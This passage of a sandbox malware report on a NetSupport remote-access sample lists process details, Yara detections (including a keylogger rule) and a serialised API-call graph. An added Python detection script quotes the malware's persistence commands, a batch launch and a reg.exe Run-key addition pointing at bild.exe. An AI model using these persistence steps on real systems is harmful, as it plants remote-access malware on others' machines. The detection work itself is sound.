                                                                                  Path:C:\Users\Public\Public\Videos\Video\bild.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\Public\Public\Videos\Video\bild.exe"
                                                                                  Imagebase:0x2d0000
                                                                                  File size:105'848 bytes
                                                                                  MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.1827675738.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000000.1823569679.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.1826096354.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.1827605672.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.1827605672.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  Target ID:9
                                                                                  Start time:06:41:21
                                                                                  Start date:16/11/2024
                                                                                  Path:C:\Users\Public\Public\Videos\Video\bild.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\Public\Public\Videos\Video\bild.exe"
                                                                                  Imagebase:0x2d0000
                                                                                  File size:105'848 bytes
                                                                                  MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.1904648910.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.1905862105.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000000.1903730466.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.1905822054.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.1905822054.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:true
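The process list above records the whole persistence chain: file.exe launches cmd.exe on netsup.bat from C:\Users\Public\Public\Videos\Video\, the batch file runs reg.exe to add a Run value named "Netstat" pointing at bild.exe in the same folder, and bild.exe (the NetSupport client) then runs from there. The script below is an added example of detection logic over process-creation events for exactly those behaviours; it is not Joe Sandbox, Sigma or NetSupport code. The sample events are constructed from the command lines in the report; the field names (image, command_line, parent_image) and the parent of bild.exe are assumptions and follow no particular SIEM schema.

```python
"""Flag a Run-key value added via reg.exe that points into a user-writable
folder, and execution of binaries or scripts from such a folder.

Added example; not Joe Sandbox, Sigma or NetSupport code.  SAMPLE_EVENTS is
constructed from the report's command lines (parent of bild.exe assumed).
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Folders where a legitimately installed, persistent program rarely lives.
SUSPICIOUS_DIR_PREFIXES = (
    "c:\\users\\public\\",
    "c:\\programdata\\",
    "c:\\windows\\temp\\",
)
USER_TEMP_RE = re.compile(r"^c:\\users\\[^\\]+\\appdata\\local\\temp\\", re.I)

# 'reg add' against a Run/RunOnce key, and its /D (data) argument.
REG_ADD_RE = re.compile(r'^\s*"?(?:[^"\s]*\\)?reg(?:\.exe)?"?\s+add\b', re.I)
RUN_KEY_RE = re.compile(
    r"\\software\\microsoft\\windows\\currentversion\\run(?:once)?\b", re.I)
REG_DATA_RE = re.compile(r'\s/d\s+(?:"([^"]*)"|(\S+))', re.I)

# Interpreters whose command line names the script actually being run.
SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}
SCRIPT_PATH_RE = re.compile(r'"([^"]+\.(?:bat|cmd|vbs|js|ps1|hta))"', re.I)


@dataclass(frozen=True)
class ProcEvent:
    image: str          # full path of the started process (assumed field name)
    command_line: str
    parent_image: str


def in_suspicious_dir(path: str) -> bool:
    p = path.strip('"').lower()
    return p.startswith(SUSPICIOUS_DIR_PREFIXES) or bool(USER_TEMP_RE.match(p))


def run_key_target(cmdline: str) -> Optional[str]:
    """Return the /D value of a 'reg add ...\\Run' command line, else None."""
    if not REG_ADD_RE.match(cmdline) or not RUN_KEY_RE.search(cmdline):
        return None
    m = REG_DATA_RE.search(cmdline)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def detect(events: List[ProcEvent]) -> List[Tuple[str, str, str]]:
    """Return (rule, subject, detail) triples for every matching event."""
    findings = []
    for ev in events:
        target = run_key_target(ev.command_line)
        if target is not None and in_suspicious_dir(target):
            findings.append(("run_key_to_suspicious_folder", ev.image, target))
        if in_suspicious_dir(ev.image):
            findings.append(("execution_from_suspicious_folder", ev.image, ev.parent_image))
        if ev.image.rsplit("\\", 1)[-1].lower() in SCRIPT_HOSTS:
            for script in SCRIPT_PATH_RE.findall(ev.command_line):
                if in_suspicious_dir(script):
                    findings.append(("script_from_suspicious_folder", ev.image, script))
    return findings


# Constructed from the process list in the report (parent of bild.exe assumed).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe",
              r'C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" "',
              r"C:\Users\user\Desktop\file.exe"),
    ProcEvent(r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
              r"C:\Windows\SysWOW64\cmd.exe"),
    ProcEvent(r"C:\Windows\SysWOW64\reg.exe",
              r'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe"',
              r"C:\Windows\SysWOW64\cmd.exe"),
    ProcEvent(r"C:\Users\Public\Public\Videos\Video\bild.exe",
              r"C:\Users\Public\Public\Videos\Video\bild.exe",
              r"C:\Windows\SysWOW64\cmd.exe"),
]

if __name__ == "__main__":
    for rule, subject, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:34} {subject}  ->  {detail}")
```

Run against the four constructed events it produces three findings, one per link of the chain (the batch file, the Run value, the dropped binary), and nothing for conhost.exe. The Run-key rule keys on the command line rather than on registry-set events so it also fires when the value is written through reg.exe under a renamed or copied binary path, as long as the "add" verb and the Run key path survive.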


                                                                                    Execution Graph

                                                                                    Execution Coverage:10.4%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:9.8%
                                                                                    Total number of Nodes:1486
                                                                                    Total number of Limit Nodes:34
                                                                                    execution_graph: [the interactive call graph is serialised here as node IDs, code addresses and edges and is omitted. API sequences recoverable from it, in graph order: IsProcessorFeaturePresent / IsDebuggerPresent / SetUnhandledExceptionFilter / UnhandledExceptionFilter and other ___scrt_* CRT start-up helpers; GetCommandLineW, GetModuleFileNameW, SetEnvironmentVariableW, GetLocalTime; OpenFileMappingW / MapViewOfFile / UnmapViewOfFile / CloseHandle; GetModuleHandleW, LoadIconW, LoadBitmapW, FindResourceW / SizeofResource / LoadResource / LockResource / GlobalAlloc / CreateStreamOnHGlobal / GdipCreateBitmapFromStream / GdipCreateHBITMAPFromBitmap; DialogBoxParamW, Sleep, CompareStringW / SetCurrentDirectoryW, DeleteObject, WaitForSingleObject / PeekMessageW; OleInitialize / GdiplusStartup / SHGetMalloc and GdiplusShutdown / CoUninitialize; GetProcAddress, LoadLibraryExW / FreeLibrary, TlsAlloc, InitializeCriticalSectionAndSpinCount; GetSystemDirectoryW / LoadLibraryW, GetVersionExW, GetFileAttributesW, GetCurrentDirectoryW; CreateFileW / SetFilePointer / ReadFile; AllocConsole, GetCurrentProcessId / AttachConsole, GetStdHandle / WriteConsoleW / FreeConsole, ExitProcess; GetCPInfo, IsDBCSLeadByte, CharUpperW, GetOEMCP / GetACP / IsValidCodePage, MultiByteToWideChar / WideCharToMultiByte, LCMapStringW, GetStringTypeW, RtlAllocateHeap, GetStartupInfoW, GetStdHandle / GetFileType; GetDC / GetDeviceCaps / ReleaseDC, GetObjectW. The graph continues beyond this excerpt.]
22570->22572 22572->22575 22617 1606e9 MultiByteToWideChar 22572->22617 22573->22565 22573->22575 22597 159437 22575->22597 22576 15ce48 GetModuleHandleW FindResourceW 22577 15ce76 22576->22577 22579 15ce70 22576->22579 22578 15c91f 52 API calls 22577->22578 22578->22579 22579->22503 22581 159747 22580->22581 22582 15979d CreateFileW 22581->22582 22583 15981b 22582->22583 22584 1597ca GetLastError 22582->22584 22583->22568 22618 15b275 22584->22618 22586 1597ea 22586->22583 22587 1597ee CreateFileW GetLastError 22586->22587 22588 159812 22587->22588 22588->22583 22590 159b0f SetFilePointer 22589->22590 22591 159afe 22589->22591 22592 159b2d GetLastError 22590->22592 22593 159b48 22590->22593 22591->22593 22631 156eae 68 API calls 22591->22631 22592->22593 22595 159b37 22592->22595 22593->22568 22595->22593 22632 156eae 68 API calls 22595->22632 22598 15946c 22597->22598 22599 15945b 22597->22599 22598->22576 22599->22598 22600 159467 22599->22600 22601 15946e 22599->22601 22633 1595ea 22600->22633 22638 1594a3 22601->22638 22607 159924 22604->22607 22606 159985 22606->22568 22607->22606 22608 159977 22607->22608 22610 159987 22607->22610 22653 159613 22607->22653 22665 156e74 68 API calls 22608->22665 22610->22606 22611 159613 5 API calls 22610->22611 22611->22610 22670 159897 22612->22670 22615 159a0b 22615->22568 22617->22575 22619 15b282 22618->22619 22627 15b28c 22619->22627 22628 15b40f CharUpperW 22619->22628 22621 15b29b 22629 15b43b CharUpperW 22621->22629 22623 15b2aa 22624 15b325 GetCurrentDirectoryW 22623->22624 22625 15b2ae 22623->22625 22624->22627 22630 15b40f CharUpperW 22625->22630 22627->22586 22628->22621 22629->22623 22630->22627 22631->22590 22632->22593 22634 1595f7 22633->22634 22635 1595f3 22633->22635 22634->22635 22644 159dac 22634->22644 22635->22598 22639 1594cd 22638->22639 22640 1594af 22638->22640 22641 1594ec 22639->22641 22652 156d80 67 API calls 22639->22652 22640->22639 22642 1594bb CloseHandle 22640->22642 22641->22598 
22642->22639 22645 16cec0 22644->22645 22646 159db9 DeleteFileW 22645->22646 22647 159611 22646->22647 22648 159dcc 22646->22648 22647->22598 22649 15b275 2 API calls 22648->22649 22650 159de0 22649->22650 22650->22647 22651 159de4 DeleteFileW 22650->22651 22651->22647 22652->22641 22654 159621 GetStdHandle 22653->22654 22655 15962c ReadFile 22653->22655 22654->22655 22656 159645 22655->22656 22657 159665 22655->22657 22666 15971a 22656->22666 22657->22607 22659 15964c 22660 15965a 22659->22660 22661 15966d GetLastError 22659->22661 22662 15967c 22659->22662 22663 159613 GetFileType 22660->22663 22661->22657 22661->22662 22662->22657 22664 15968c GetLastError 22662->22664 22663->22657 22664->22657 22664->22660 22665->22606 22667 159720 22666->22667 22668 159723 GetFileType 22666->22668 22667->22659 22669 159731 22668->22669 22669->22659 22671 159902 22670->22671 22672 1598a3 22670->22672 22671->22615 22675 156eae 68 API calls 22671->22675 22673 1598da SetFilePointer 22672->22673 22673->22671 22674 1598f8 GetLastError 22673->22674 22674->22671 22675->22615 22677 17494d _abort 22676->22677 22678 174965 22677->22678 22679 174a9b _abort GetModuleHandleW 22677->22679 22698 1776d6 EnterCriticalSection 22678->22698 22681 174959 22679->22681 22681->22678 22710 174adf GetModuleHandleExW 22681->22710 22684 17496d 22694 1749e2 22684->22694 22697 174a0b 22684->22697 22718 175447 20 API calls _abort 22684->22718 22686 174a54 22719 17f149 5 API calls _ValidateLocalCookies 22686->22719 22687 174a28 22702 174a5a 22687->22702 22691 1756d0 _abort 5 API calls 22696 1749fa 22691->22696 22692 1756d0 _abort 5 API calls 22692->22697 22694->22691 22694->22696 22696->22692 22699 174a4b 22697->22699 22698->22684 22720 17771e LeaveCriticalSection 22699->22720 22701 174a24 22701->22686 22701->22687 22721 177b13 22702->22721 22705 174a88 22708 174adf _abort 8 API calls 22705->22708 22706 174a68 GetPEB 22706->22705 22707 174a78 GetCurrentProcess TerminateProcess 22706->22707 22707->22705 22709 
174a90 ExitProcess 22708->22709 22711 174b2c 22710->22711 22712 174b09 GetProcAddress 22710->22712 22714 174b32 FreeLibrary 22711->22714 22715 174b3b 22711->22715 22713 174b1e 22712->22713 22713->22711 22714->22715 22716 16d783 _ValidateLocalCookies 5 API calls 22715->22716 22717 174b45 22716->22717 22717->22678 22718->22694 22720->22701 22722 177b38 22721->22722 22724 177b2e 22721->22724 22723 177735 _abort 5 API calls 22722->22723 22723->22724 22725 16d783 _ValidateLocalCookies 5 API calls 22724->22725 22726 174a64 22725->22726 22726->22705 22726->22706 23805 151019 29 API calls pre_c_initialization 23809 16d002 38 API calls 2 library calls 23911 176f03 21 API calls 2 library calls 23857 173501 QueryPerformanceFrequency QueryPerformanceCounter 23912 17c301 21 API calls __vswprintf_c_l 23881 170a00 6 API calls 4 library calls 23913 16d736 20 API calls 23858 16a537 93 API calls _swprintf 23859 175536 8 API calls ___vcrt_uninitialize 23815 17f830 DeleteCriticalSection 23861 160d3a 26 API calls std::bad_exception::bad_exception 23772 16c726 19 API calls ___delayLoadHelper2@8 23862 169123 73 API calls 23817 16b820 72 API calls 23788 176428 23796 17784c 23788->23796 23791 17643c 23793 176444 23794 176451 23793->23794 23804 176454 11 API calls 23793->23804 23797 177735 _abort 5 API calls 23796->23797 23798 177873 23797->23798 23799 17788b TlsAlloc 23798->23799 23800 17787c 23798->23800 23799->23800 23801 16d783 _ValidateLocalCookies 5 API calls 23800->23801 23802 176432 23801->23802 23802->23791 23803 1763a3 20 API calls 3 library calls 23802->23803 23803->23793 23804->23791 23863 16d553 46 API calls 6 library calls 23864 16995f 104 API calls 23865 16955f 71 API calls 22728 16cd5c 22729 16cd66 22728->22729 22732 16cabc 22729->22732 22760 16c7ca 22732->22760 22734 16cad6 22735 16cb33 22734->22735 22749 16cb57 22734->22749 22771 16ca3a 11 API calls 3 library calls 22735->22771 22737 16cb3e RaiseException 22738 16cd2c 22737->22738 22740 16d783 _ValidateLocalCookies 5 API 
calls 22738->22740 22739 16cbcf LoadLibraryExA 22741 16cbe2 GetLastError 22739->22741 22742 16cc30 22739->22742 22743 16cd3b 22740->22743 22745 16cbf5 22741->22745 22746 16cc0b 22741->22746 22744 16cc3b FreeLibrary 22742->22744 22747 16cc42 22742->22747 22744->22747 22745->22742 22745->22746 22772 16ca3a 11 API calls 3 library calls 22746->22772 22748 16cca0 GetProcAddress 22747->22748 22755 16ccfe 22747->22755 22750 16ccb0 GetLastError 22748->22750 22748->22755 22749->22739 22749->22742 22749->22747 22749->22755 22752 16ccc3 22750->22752 22752->22755 22773 16ca3a 11 API calls 3 library calls 22752->22773 22754 16cc16 RaiseException 22754->22738 22774 16ca3a 11 API calls 3 library calls 22755->22774 22757 16cce4 RaiseException 22758 16c7ca ___delayLoadHelper2@8 11 API calls 22757->22758 22759 16ccfb 22758->22759 22759->22755 22761 16c7d6 22760->22761 22762 16c7fc 22760->22762 22775 16c878 8 API calls 2 library calls 22761->22775 22762->22734 22764 16c7db 22765 16c7f7 22764->22765 22776 16c9ca VirtualQuery GetSystemInfo VirtualProtect DloadObtainSection DloadMakePermanentImageCommit 22764->22776 22777 16c7fd GetModuleHandleW GetProcAddress GetProcAddress 22765->22777 22768 16d783 _ValidateLocalCookies 5 API calls 22769 16cab8 22768->22769 22769->22734 22770 16ca87 22770->22768 22771->22737 22772->22754 22773->22757 22774->22738 22775->22764 22776->22765 22777->22770 23822 15605e 73 API calls 23914 177ede 27 API calls _ValidateLocalCookies 23823 170058 RaiseException 23890 169646 92 API calls 23915 171b40 5 API calls 2 library calls 22788 169b4f 22789 169b59 __EH_prolog 22788->22789 22948 1512e7 22789->22948 22792 16a230 23021 16b8bc 22792->23021 22793 169b9b 22795 169c11 22793->22795 22796 169ba8 22793->22796 22853 169b87 22793->22853 22798 169cb0 GetDlgItemTextW 22795->22798 22804 169c2b 22795->22804 22805 169bad 22796->22805 22926 169be4 22796->22926 22801 169ce7 22798->22801 22798->22926 22799 16a24e SendMessageW 22800 16a25c 22799->22800 22802 16a276 GetDlgItem 
SendMessageW 22800->22802 22803 16a265 SendDlgItemMessageW 22800->22803 22808 169cf0 22801->22808 22809 169cff GetDlgItem 22801->22809 23039 168b8e GetCurrentDirectoryW 22802->23039 22803->22802 22810 15d142 54 API calls 22804->22810 22811 15d142 54 API calls 22805->22811 22805->22853 22806 169c05 KiUserCallbackDispatcher 22806->22853 22822 16a1d0 22808->22822 22808->22926 22813 169d13 SendMessageW SendMessageW 22809->22813 22814 169d39 SetFocus 22809->22814 22815 169c4d SetDlgItemTextW 22810->22815 22816 169bc7 22811->22816 22812 16a2a8 GetDlgItem 22817 16a2c7 SetWindowTextW 22812->22817 22818 16a2c1 22812->22818 22813->22814 22820 169d49 22814->22820 22833 169d55 22814->22833 22819 169c5b 22815->22819 23061 151227 SHGetMalloc 22816->23061 23040 168fc8 GetClassNameW 22817->23040 22818->22817 22828 169c68 GetMessageW 22819->22828 22841 169c8e TranslateMessage DispatchMessageW 22819->22841 22819->22853 22824 15d142 54 API calls 22820->22824 22826 15d142 54 API calls 22822->22826 22829 169d53 22824->22829 22825 169bce 22830 169bd2 SetDlgItemTextW 22825->22830 22825->22853 22831 16a1e0 SetDlgItemTextW 22826->22831 22828->22819 22828->22853 22958 16b70e GetDlgItem 22829->22958 22830->22853 22834 16a1f4 22831->22834 22837 15d142 54 API calls 22833->22837 22840 15d142 54 API calls 22834->22840 22839 169d87 22837->22839 22838 169daa 22966 159cce 22838->22966 22844 153f5b _swprintf 51 API calls 22839->22844 22845 16a21d 22840->22845 22841->22819 22842 16a312 22843 16a342 22842->22843 22848 15d142 54 API calls 22842->22848 22852 16aa45 91 API calls 22843->22852 22896 16a3fa 22843->22896 22844->22829 22849 15d142 54 API calls 22845->22849 22847 16aa45 91 API calls 22847->22842 22851 16a325 SetDlgItemTextW 22848->22851 22849->22853 22858 15d142 54 API calls 22851->22858 22859 16a35d 22852->22859 22854 16a4aa 22860 16a4b3 EnableWindow 22854->22860 22861 16a4bc 22854->22861 22855 169de6 22972 169023 SetCurrentDirectoryW 22855->22972 22856 169ddf GetLastError 22856->22855 22863 
16a339 SetDlgItemTextW 22858->22863 22870 16a36f 22859->22870 22884 16a394 22859->22884 22860->22861 22864 16a4d9 22861->22864 23070 1512a4 GetDlgItem EnableWindow 22861->23070 22862 169dfc 22867 169e0f 22862->22867 22868 169e05 GetLastError 22862->22868 22863->22843 22869 16a500 22864->22869 22876 16a4f8 SendMessageW 22864->22876 22865 16a3ed 22872 16aa45 91 API calls 22865->22872 22875 169e8a 22867->22875 22880 169e9a 22867->22880 22881 169e27 GetTickCount 22867->22881 22868->22867 22869->22853 22877 15d142 54 API calls 22869->22877 23068 16859c 6 API calls 22870->23068 22871 16a4cf 23071 1512a4 GetDlgItem EnableWindow 22871->23071 22872->22896 22879 16a0d3 22875->22879 22875->22880 22876->22869 22883 16a519 SetDlgItemTextW 22877->22883 22878 16a388 22878->22884 22981 1512c2 GetDlgItem ShowWindow 22879->22981 22886 169eb2 GetModuleFileNameW 22880->22886 22887 16a06e 22880->22887 22888 153f5b _swprintf 51 API calls 22881->22888 22882 16a488 23069 16859c 6 API calls 22882->23069 22883->22853 22884->22865 22891 16aa45 91 API calls 22884->22891 23062 15de7c 73 API calls 22886->23062 22900 15d142 54 API calls 22887->22900 22887->22926 22894 169e44 22888->22894 22890 15d142 54 API calls 22890->22896 22897 16a3c2 22891->22897 22892 16a0e3 22982 1512c2 GetDlgItem ShowWindow 22892->22982 22973 1594f1 22894->22973 22895 16a4a7 22895->22854 22896->22854 22896->22882 22896->22890 22897->22865 22901 16a3cb DialogBoxParamW 22897->22901 22899 169edc 22903 153f5b _swprintf 51 API calls 22899->22903 22904 16a082 22900->22904 22901->22865 22901->22926 22902 16a0ed 22905 15d142 54 API calls 22902->22905 22906 169efe CreateFileMappingW 22903->22906 22907 153f5b _swprintf 51 API calls 22904->22907 22909 16a0f7 SetDlgItemTextW 22905->22909 22910 169f60 GetCommandLineW 22906->22910 22943 169fdd __vswprintf_c_l 22906->22943 22911 16a0a0 22907->22911 22983 1512c2 GetDlgItem ShowWindow 22909->22983 22915 169f71 22910->22915 22922 15d142 54 API calls 22911->22922 22912 169e6a 22916 169e71 
GetLastError 22912->22916 22917 169e78 22912->22917 22913 169fe8 ShellExecuteExW 22938 16a005 22913->22938 23063 1697e4 SHGetMalloc 22915->23063 22916->22917 22918 159437 72 API calls 22917->22918 22918->22875 22919 16a10b SetDlgItemTextW GetDlgItem 22923 16a124 GetWindowLongW SetWindowLongW 22919->22923 22924 16a13c 22919->22924 22921 169f8d 23064 1697e4 SHGetMalloc 22921->23064 22922->22926 22923->22924 22984 16aa45 22924->22984 22926->22806 22926->22853 22929 169f99 23065 1697e4 SHGetMalloc 22929->23065 22930 16aa45 91 API calls 22933 16a158 22930->22933 22932 16a048 22932->22887 22937 16a05e UnmapViewOfFile CloseHandle 22932->22937 23009 16bc78 22933->23009 22934 169fa5 23066 15dfde 73 API calls ___scrt_get_show_window_mode 22934->23066 22937->22887 22938->22932 22941 16a034 Sleep 22938->22941 22940 169fbc MapViewOfFile 22940->22943 22941->22932 22941->22938 22943->22913 22949 1512f0 22948->22949 22950 151349 22948->22950 22952 151356 22949->22952 23072 15ced7 22949->23072 23090 15ceb0 GetWindowLongW SetWindowLongW 22950->23090 22952->22792 22952->22793 22952->22853 22955 151325 GetDlgItem 22955->22952 22956 151335 22955->22956 22956->22952 22957 15133b SetWindowTextW 22956->22957 22957->22952 22959 16b76a SendMessageW SendMessageW 22958->22959 22960 16b73a 22958->22960 22961 16b7a2 22959->22961 22962 16b7c1 SendMessageW SendMessageW SendMessageW 22959->22962 22963 16b745 ShowWindow SendMessageW SendMessageW 22960->22963 22961->22962 22964 16b7ec SendMessageW 22962->22964 22965 16b80b SendMessageW 22962->22965 22963->22959 22964->22965 22965->22838 22968 159cd8 22966->22968 22967 159d69 22969 159e86 9 API calls 22967->22969 22971 159d92 22967->22971 22968->22967 22968->22971 23094 159e86 22968->23094 22969->22971 22971->22855 22971->22856 22972->22862 22974 1594fb 22973->22974 22975 159565 CreateFileW 22974->22975 22976 159559 22974->22976 22975->22976 22977 15b275 2 API calls 22976->22977 22979 1595b7 22976->22979 22978 15959e 22977->22978 22978->22979 22980 
1595a2 CreateFileW 22978->22980 22979->22912 22980->22979 22981->22892 22982->22902 22983->22919 22985 16aa4f __EH_prolog 22984->22985 22986 16a14a 22985->22986 23126 1696ec 22985->23126 22986->22930 22989 1696ec ExpandEnvironmentStringsW 22998 16aa86 _wcsrchr 22989->22998 22990 16ad86 SetWindowTextW 22990->22998 22995 16ab77 SetFileAttributesW 22997 16ac32 GetFileAttributesW 22995->22997 23006 16ab6a ___scrt_get_show_window_mode 22995->23006 23000 16ac40 DeleteFileW 22997->23000 22997->23006 22998->22986 22998->22989 22998->22990 23002 16af50 GetDlgItem SetWindowTextW SendMessageW 22998->23002 23004 16af92 SendMessageW 22998->23004 22998->23006 23130 160b12 CompareStringW 22998->23130 23131 168b8e GetCurrentDirectoryW 22998->23131 23132 15a1a9 7 API calls 22998->23132 23135 15a132 FindClose 22998->23135 23136 169844 69 API calls new 22998->23136 23137 1720de 22998->23137 23000->23006 23002->22998 23003 153f5b _swprintf 51 API calls 23005 16ac75 GetFileAttributesW 23003->23005 23004->22998 23005->23006 23007 16ac86 MoveFileW 23005->23007 23006->22995 23006->22997 23006->22998 23006->23003 23133 15b100 52 API calls 2 library calls 23006->23133 23134 15a1a9 7 API calls 23006->23134 23007->23006 23008 16ac9e MoveFileExW 23007->23008 23008->23006 23010 16bc82 __EH_prolog 23009->23010 23152 15f165 69 API calls 23010->23152 23012 16bcb3 23153 155bb7 69 API calls 23012->23153 23014 16bcd1 23154 157b10 74 API calls 2 library calls 23014->23154 23016 16bd15 23155 157c84 23016->23155 23018 16bd24 23164 157ba0 23018->23164 23022 16b8c9 23021->23022 23023 168ac0 6 API calls 23022->23023 23024 16b8ce 23023->23024 23025 16b8d6 GetWindow 23024->23025 23026 16a236 23024->23026 23025->23026 23029 16b8f2 23025->23029 23026->22799 23026->22800 23027 16b8ff GetClassNameW 23681 160b12 CompareStringW 23027->23681 23029->23026 23029->23027 23030 16b927 GetWindowLongW 23029->23030 23031 16b988 GetWindow 23029->23031 23030->23031 23032 16b937 SendMessageW 23030->23032 23031->23026 
23031->23029 23032->23031 23033 16b94d GetObjectW 23032->23033 23682 168b22 GetDC GetDeviceCaps ReleaseDC 23033->23682 23036 16b962 23683 168adf GetDC GetDeviceCaps ReleaseDC 23036->23683 23684 168cf3 8 API calls ___scrt_get_show_window_mode 23036->23684 23038 16b972 SendMessageW DeleteObject 23038->23031 23039->22812 23041 168fe9 23040->23041 23047 16900e 23040->23047 23685 160b12 CompareStringW 23041->23685 23043 169013 SHAutoComplete 23044 16901c 23043->23044 23048 169485 23044->23048 23045 168ffc 23046 169000 FindWindowExW 23045->23046 23045->23047 23046->23047 23047->23043 23047->23044 23049 16948f __EH_prolog 23048->23049 23050 15137e 75 API calls 23049->23050 23051 1694b1 23050->23051 23686 151edd 23051->23686 23054 1694da 23056 1518f6 127 API calls 23054->23056 23055 1694cb 23057 15162e 79 API calls 23055->23057 23059 1694fc __vswprintf_c_l new 23056->23059 23058 1694d6 23057->23058 23058->22842 23058->22847 23060 15162e 79 API calls 23059->23060 23060->23058 23061->22825 23062->22899 23063->22921 23064->22929 23065->22934 23066->22940 23068->22878 23069->22895 23070->22871 23071->22864 23091 15c88e 23072->23091 23074 15cefd GetWindowRect GetClientRect 23075 15cff2 23074->23075 23080 15cf57 23074->23080 23076 15d034 GetSystemMetrics GetWindow 23075->23076 23077 15cffc GetWindowTextW 23075->23077 23083 15d054 23076->23083 23078 15c91f 52 API calls 23077->23078 23079 15d028 SetWindowTextW 23078->23079 23079->23076 23080->23076 23081 15cfb8 GetWindowLongW 23080->23081 23085 15cfe2 GetWindowRect 23081->23085 23082 151312 23082->22952 23082->22955 23083->23082 23084 15d060 GetWindowTextW 23083->23084 23086 15c91f 52 API calls 23083->23086 23087 15d0a6 GetWindowRect 23083->23087 23088 15d11b GetWindow 23083->23088 23084->23083 23085->23075 23089 15d093 SetWindowTextW 23086->23089 23087->23088 23088->23082 23088->23083 23089->23083 23090->22952 23092 15c91f 52 API calls 23091->23092 23093 15c8b6 _wcschr 23092->23093 23093->23074 23095 159e93 23094->23095 23096 
159eb7 23095->23096 23098 159eaa CreateDirectoryW 23095->23098 23115 159dff 23096->23115 23098->23096 23100 159eea 23098->23100 23104 159ef9 23100->23104 23107 15a0c3 23100->23107 23101 159efd GetLastError 23101->23104 23102 15b275 2 API calls 23105 159ed3 23102->23105 23104->22968 23105->23101 23106 159ed7 CreateDirectoryW 23105->23106 23106->23100 23106->23101 23108 16cec0 23107->23108 23109 15a0d0 SetFileAttributesW 23108->23109 23110 15a0e6 23109->23110 23111 15a113 23109->23111 23112 15b275 2 API calls 23110->23112 23111->23104 23113 15a0fa 23112->23113 23113->23111 23114 15a0fe SetFileAttributesW 23113->23114 23114->23111 23118 159e13 23115->23118 23119 16cec0 23118->23119 23120 159e20 GetFileAttributesW 23119->23120 23121 159e31 23120->23121 23122 159e08 23120->23122 23123 15b275 2 API calls 23121->23123 23122->23101 23122->23102 23124 159e45 23123->23124 23124->23122 23125 159e49 GetFileAttributesW 23124->23125 23125->23122 23127 1696f6 23126->23127 23128 1697cc 23127->23128 23129 1697a9 ExpandEnvironmentStringsW 23127->23129 23128->22998 23129->23128 23130->22998 23131->22998 23132->22998 23133->23006 23134->23006 23135->22998 23136->22998 23138 175aea 23137->23138 23139 175af7 23138->23139 23140 175b02 23138->23140 23142 1759fc __vswprintf_c_l 21 API calls 23139->23142 23141 175b0a 23140->23141 23148 175b13 __CreateFrameInfo 23140->23148 23143 1759c2 _free 20 API calls 23141->23143 23146 175aff 23142->23146 23143->23146 23144 175b3d HeapReAlloc 23144->23146 23144->23148 23145 175b18 23150 175e3e 20 API calls _abort 23145->23150 23146->22998 23148->23144 23148->23145 23151 1746ca 7 API calls 2 library calls 23148->23151 23150->23146 23151->23148 23152->23012 23153->23014 23154->23016 23156 157c8e 23155->23156 23161 157cf8 23156->23161 23190 15a145 23156->23190 23158 157da4 23158->23018 23160 157d62 23160->23158 23196 156d0d 67 API calls 23160->23196 23161->23160 23162 15a145 8 API calls 23161->23162 23168 15820b 23161->23168 23162->23161 23165 157bae 
